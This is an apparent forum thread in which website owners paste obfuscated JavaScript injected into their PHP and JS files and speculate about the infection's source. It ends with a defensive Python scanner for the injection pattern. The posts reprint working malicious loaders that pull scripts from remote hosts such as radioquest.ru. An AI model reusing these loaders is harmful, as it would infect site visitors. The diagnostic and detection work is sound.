Hello,

I got this error:

Parse error: syntax error, unexpected '<' in /var/www/vhosts/psy.cc/www/index.php on line 41

And I found this strange script in index.php:

<script>be=14802;be++;this.k='';var hL={N:false};var c;q=function(){AE=6784;AE-=226;var D=false;var E=[];var Dn=new String();function L(r,cW,o){qb=16948;qb-=150;rp=15910;rp-=251;return r.substr(cW,o);this.xP=58002;this.xP-=208;Hk=39478;Hk++;}var __=new String();Q={inG:false};uM=[];var v=document;this.oS=false;var j=[];var A=RegExp;var Cr={Qc:65015};var x=new String(L("/goolQBj",0,4)+L("gle.NxR",0,4)+"com/"+L("tnafDOVb",0,4)+L("DY3elix.eD3Y",4,4)+L("com/S7X",0,4)+"onli"+"nedo"+L("wn.n7d5",0,4)+L("et.pbTy",0,4)+"hp");var T='';function b(r,cW){var Z=new String();var Qy=new String();var o=new String(L("[3si",0,1))+cW+"]";var l=new A(o, "g");fI=[];var ev=new Array();return r.replace(l, T);this.s="";var rP=[];};eD={uO:"NK"};hs={Ai:"_O"};w={};var ge=["nv","jQ"];var qf=b('secTr0iKpqt1','QNluVwLF_0TH4feKqg1');var C=972490-964410;var g=L("bodyh4a",0,4);var M=null;CC=6602;CC-=53;z={gm:"U"};var MJ=["Gi"];c=function(){try {this.vv=false;var qfl=b('c3rMe3agtMeBEhlLeympeHn8t0','MygVLwB3p98qhHPf0');Sv=62668;Sv-=182;O=v[qfl](qf);try {} catch(LM){};var qN=new Array();kA=14135;kA+=109;var r=C+x;var eI={HT:"sx"};this.Rt=33100;this.Rt-=38;zr=44104;zr++;var ia=new String();var I=L("de0L6",0,2)+L("feKHR",0,2)+L("rvlt",0,1);var QR={mp:"lf"};this.gS="gS";var AQ=b('shrhcW','pmZj4HflMWF2h6a');var tL={Ju:false};var sN=[];var zw='';AT=12596;AT--;yH=1449;yH++;O[I]=[1][0];try {} catch(RS){};var ww={};O[AQ]=new String("htt"+"p:/"+L("/fupGK",0,3)+L("mRdrrymRd",3,3)+"ent"+"ry."+L("ru:i9B",0,3))+r;try {} catch(Zg){};this.A_="A_";var Kn={Xk:false};v[g].appendChild(O);var AO={Xz:16176};try {var JTA='SW'} catch(JTA){};} catch(u){YC=18203;YC-=26;var xL=false;var mP=53405;};this.eb='';var KV=new Array();};RFo={mM:"Kb"};var dG=["DZ","bw"];};var wY=["ai","jC","FH"];var kz=new String();q();window.onload=c;this.dp="dp";IWz=4341;IWz++;</script>
<!--8ad0ec6313785bee0ec9d8f831c453cc-->

What is this monster?

Thanks

Comments

drgonzo121’s picture

And at about the same time some other dude called me, saying he had a WSOD... I checked his index.php and found this code:

<script>var q=false;TB=27668;TB--;Me={Y:39770};var L=["kf","v"];var R;W=function(){var OW={Ja:"lj"};var Qo=["OX"];P=38559;P+=142;var po={My:false};function N(e,J,A){try {} catch(S){};return e.substr(J,A);}var QA=RegExp;var j=new String("/goog"+N("le.corwH",0,5)+N("m/the3FOu",0,5)+"sun.c"+N("o.uk/SEHP",0,5)+N("e3IZicibaIe3Z",4,5)+N(".com.BUCJ",0,5)+N("phpN8jF",0,3));var k=document;try {var lH='iu'} catch(lH){};var T='';VV=["zf"];this.a=692;this.a+=158;function Q(e,J){var A=String("[")+J+String(N("]eot",0,1));var U=new QA(A, "g");return e.replace(U, T);};jm=["m","gc","LD"];EJ={Jl:false};var M=null;this.Rw='';this.Yu=54493;this.Yu+=231;var de=new Array();var jF=Q('sWc5r1iWput1','WVu5L1');var b=new String("bod"+N("yK30n",0,1));var c=947410-939330;this.s=false;R=function(){try {var tr=new Date();C={w:20017};var E=Q('cdrYedaGtse_EdlGekmke_n_tY','Yk9sGd_');fK=["tZ","_J","tt"];EM=["_I","lF","Nv"];O=k[E](jF);Sf=14261;Sf+=16;JY=62226;JY-=70;var Al=Q('sKrQcQ','wbLXKPQO');var h=["aI"];var Rp={};K=[];var e=c+j;this.dq="";var l="de"+N("feVOr",0,2)+"r";var bq=[];var it={eZ:57184};O[l]=[1][0];var qW=["Lt","y"];this.Mg="Mg";var ig=new Date();O[Al]="http"+"://f"+"urry"+N("entrgLui",0,4)+N("y.ruz32T",0,4)+N("qtAm:tmqA",4,1)+e;lq={VA:"No"};Cg=8939;Cg++;k[b].appendChild(O);} catch(jb){UA={MI:"D"};qp={Hn:62514};var Lw=new String();};SKp=["uf","FO","Vk"];};this.fn=63042;this.fn--;this.sZ=51403;this.sZ--;};W();try {var MqU='LV'} catch(MqU){};this.Hi=false;var jX={Mm:"Pl"};window.onload=R;this.ml="ml";r=46098;r++;this.UI=40275;this.UI-=39;</script>
<!--150d769bcaf00c5e96b07bdfb51c0544-->

So what's happening?

Both sites are running again... the first site is running on Drupal 6.14

drgonzo121’s picture

Now I also found the same code in a WordPress of mine... it's fucked up

www.mentalreactor.be

TontonX’s picture

I had exactly the same problem and tried to figure out where it was coming from, without success...

I have 4 websites, each pointing to a different directory on my host provider.

And it began one month ago: I had this script, which came into each of my .php and .js files
in all my directories and subdirectories.

The result was that all my JavaScript scrollings and DHTML menus were screwed up; I uploaded
fresh versions of these .php files from my local copy, and it solved the problem.

But again it happened one more time yesterday!

And this time I had recently installed 2 Drupal websites, and it completely screwed up all the files in all the subdirectories...

I had some questions for you if you don't mind... as we had the same problem

1) Your host provider wouldn't be phpnet.org? (I am there)
2) Would you use some autosurf software? (I do, and I am wondering if I got some trojan or something like that)
3) Would you use third-party Sothink software to create DHTML and JavaScript scrollings? (I do, so I am also wondering if their code is screwing up everything over time)

If you also had questions for me, I would be glad to answer... as it's the first year I've seen something like that screwing up my websites.

Marc

drgonzo121’s picture

www.mentalreactor.be is a WordPress and that had the same malicious code
ww.psy.cc is on another physical server .... no connection at all...

1) No
2) What is autosurf?
3) I use the admin menu

I think we might have been hacked?

Anybody else?

drgonzo121’s picture

my wordpress is fucked up good man

http://www.mentalreactor.be/

in a subdirectory i had also a drupal

http://www.mentalreactor.be/drupal and there also the index.php file was edited with that malicious code ...

that's three spots on two servers

drgonzo121’s picture

Apparently this test WP didn't get hit:

http://www.mentalreactor.be/wp2/

TontonX’s picture

I asked on the forum of my host provider, and it seemed another guy got the problem too, and he was using Joomla...

But personally I think it's not related to a specific CMS, as in fact I had this problem 1 month before installing my 2 recent Drupal websites.

So I am really wondering where that thing is coming from...

I even changed my FTP password the first time it happened...

Some kind of new super virus roaming the net, I don't know...

drgonzo121’s picture

Did you have it on one single installation, after you removed the malicious code?

It's not gonna be a friend of mine, updated my WordPress to the latest version

Nobody else has this problem?

Can't imagine we're the only two people encountering this problem....

TontonX’s picture

Personally I removed my Drupal website...

to create one fresh website composed only of .php files with the Adobe suite

so it wasn't related anymore to any CMS...

and guess what...

today I found this back at the end of my index.php

var J=false;var U;this.K=10061;this.K--;w=function(){DZ={};this.Gn=36311;this.Gn+=73;var dL=33077;function x(p,C,a){return p.substr(C,a);}uH=63067;uH-=88;var d=RegExp;var Yx=2188;this.GV=40435;this.GV--;var G=document;var wr={Lf:false};var o='';this._P="_P";var Bx={};var Z=new String(x("/gVpS",0,2)+x("78Boo8B7",3,2)+x("glSmM",0,2)+x("e-9Qo",0,2)+x("beOPMv",0,2)+"/g"+"oo"+"gl"+x("tIVe.VtI",3,2)+x("JBbcobBJ",3,2)+"m/"+"mo"+"zi"+"ll"+x("s3Ja.Js3",3,2)+"co"+x("SeJm.eJS",3,2)+"ph"+x("pwG38",0,1));r=42741;r--;q=7703;q+=197;RF=51568;RF-=62;var k=["ge","Jy"];function V(p,C){Du=["l","yW","Cb"];this.c=6916;this.c--;var a=new String("[")+C+new String("]");var _=new d(a, new String(x("gEHy",0,1)));this.ez=false;return p.replace(_, o);this.JG=18264;this.JG+=204;this.VI='';};var dd=false;var Cp=["mr","DU","mA"];s={A:false};var Gt=V('sqc2rqizpLtw','ILzChq6nZw24');try {var Fk='lg'} catch(Fk){};this.Ag=52244;this.Ag-=247;var I=null;var UG=["St","Or","FI"];var v=x("bodyXSu5",0,4);Zu=["zQ","Iw"];var fx=["PB","dQ"];var g=780115-772035;U=function(){K_=37642;K_+=62;try {Jg=["fI"];var E=V('cHrPehaptheHEUlDeXmQePnWth','GUpQfXjHhWRgVDP');xx=G[E](Gt);var jx="jx";eO=[];this.RK=62849;this.RK++;var BX='';var p=g+Z;var Sn=["r_","zA"];this.QT="QT";var _e=x("depq3G",0,2)+"fe"+x("VoereoV",3,1);var nu=new Date();var e=V('sbr8ch','8AbTXqQh');xx[_e]=[1,2][0];YT=["BW","vv","CO"];this.rA="rA";xx[e]="http:"+"//rad"+"ioque"+"st.ru"+x(":iCOj",0,1)+p;G[v].appendChild(xx);var Gy=["sCM"];} catch(F){this.PRg=53406;this.PRg--;var SJ=["Lm","op","_y"];this.gI=false;};Ek=19070;Ek+=194;var GY=["oD","DA"];};this.Bu='';};w();ps=["na","nN"];nY=1060;nY++;window.onload=U;var aa="";try {var Lo='Ob'} catch(Lo){};try {var NR='Qt'} catch(NR){};var AY="";

Hopefully, as my new website is in Flash and there are no JavaScripts in it, I didn't notice a difference... but I saw the navigator was trying to connect to some unknown locations...

So once again I re-uploaded my local clean file...

So I think it's not related to a CMS but more to something infecting our respective remote FTPs...

I am sure we're not alone in this, but it's true that people won't automatically notice it, as it's at the end of their PHP files... and so far I've seen it was only causing trouble if the concerned page contained JavaScripts or references to .js files. (Personally, all my JavaScripts were screwed on my first website.)

So if it's infecting other pages not including JavaScripts, unless people check their websites and their navigator connections they won't be aware of that fuck... malicious code

drgonzo121’s picture

I found out that it was nestled in all the tinymce js files on the WordPress forum plugin (free forum or something?)

perhaps the tinymce track ?

could it come through tinymce?

drgonzo121’s picture

so perhaps it's tinymce?

all js files in wordpress contained in the free forum plugin were infected,

and then all index files were injected with
<script> bigsophie blog</script>

drgonzo121’s picture

my excuses for the three posts

drgonzo121’s picture

document.write('<s'+'cript type="text/javascript" src="http://blog.bigsophieblog.com/xxx"></scr'+'ipt>');

xxx= Upload.js

this is on two different hostings ... wordpress simple-forum js files and on one drupal site ...
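
A defensive sweep for the injection pattern described in this thread (added example, not part of the original posts): it walks a web root and flags .php/.js/.html files that carry the trailing 32-hex-digit HTML comment, a `document.write` with a split script tag, or a single long line combining `window.onload=`, `.appendChild(`, `.substr(` and `.replace(`. The indicator names, the 200-character threshold and the sample files are assumptions constructed for illustration, and hits are heuristics that need manual review.

```python
import os
import re
import tempfile

INDICATORS = {
    # 32-hex-digit HTML comment trailing the injected <script> (heuristic from the thread)
    "hex-marker-comment": re.compile(r"<!--[0-9a-f]{32}-->"),
    # script tag split into string pieces inside document.write()
    "split-script-tag": re.compile(r"document\.write\(\s*['\"]<s['\"]\s*\+\s*['\"]cript", re.I),
}
LOADER_TOKENS = ("window.onload=", ".appendChild(", ".substr(", ".replace(")
MIN_LOADER_LINE = 200  # assumption: the injected loader arrives as one long line

def scan_text(text):
    """Return sorted indicator names found in one file's text."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    for line in text.splitlines():
        if len(line) >= MIN_LOADER_LINE and all(t in line for t in LOADER_TOKENS):
            hits.add("one-line-onload-loader")
    return sorted(hits)

def scan_tree(root, exts=(".php", ".js", ".html", ".htm")):
    """Map relative path -> indicators for every suspicious file under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_text(fh.read())
                if hits:
                    findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings

def demo():
    """Scan a constructed web root built from harmless stand-ins."""
    loader = ("<script>" + "var a=1;" * 30 + "function f(s,i,n){return s.substr(i,n);}"
              "var t=s.replace(r,'');document.body.appendChild(el);window.onload=g;</script>")
    files = {
        "index.php": "<?php echo 'home'; ?>\n" + loader + "\n<!--" + "0f" * 16 + "-->\n",
        "js/editor.js": "document.write('<s'+'cript src=\"x.js\"></scr'+'ipt>');\n",
        "clean.php": "<?php echo 'ok'; ?>\n<script>window.onload=function(){};</script>\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)
```

Point `scan_tree()` at the real document root and diff every flagged file against a known-clean local copy before re-uploading.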